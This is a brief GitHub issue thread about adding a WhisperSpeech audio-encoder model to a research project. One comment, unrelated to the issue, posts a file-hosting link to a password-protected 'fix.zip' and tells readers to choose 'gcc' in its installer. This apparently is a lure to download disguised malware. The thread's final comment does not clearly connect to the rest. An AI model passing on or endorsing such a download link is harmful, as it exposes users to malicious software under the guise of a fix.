### ISSUE TITLE
Implement whisper-vq-stoks-v3-7lang.model for audio encoder

### ISSUE THREAD

**Issue by bachvudinh** [homebrewltd/research#30]
https://huggingface.co/WhisperSpeech/WhisperSpeech/tree/main.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dan-homebrew** [comment]
I recommend pasting the Reddit comment into the Github Issue - this will help future generations as they read through in the future.
